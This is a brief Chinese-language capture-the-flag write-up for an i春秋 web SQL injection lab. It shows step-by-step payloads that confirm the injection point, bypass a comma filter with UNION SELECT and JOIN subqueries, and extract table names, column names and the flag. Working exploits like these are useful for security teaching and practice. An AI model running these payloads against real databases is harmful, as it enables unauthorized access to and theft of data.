实验环境
i春秋,web SQLI
正常的sql语句
select * from test where id=1 and 1=2 union select * from ((select 1)a join (select 2)b join (select 3)c)
select * from test where id=1 and 1=2 union select * from ((select 1)a join (select 2)b join (select group_concat(table_name) from information_schema.tables where table_schema=database())c)
注入过程
进去界面如下,id=1
输入单引号
输入' and 1=1%23
输入' and 1=2%23
确定这里存在注入
字段为2
判断可显字段,发现逗号后面的字符都没了
过滤逗号,可利用join语句来注入
' union select * from (select 1) a join (select 2) b %23
1和2都是可显字段
' union select * from (select table_name from information_schema.tables where table_schema='sqli') a join (select database()) b %23
查询数据库,和表
' union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23
查询字段名
查询flag
' union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
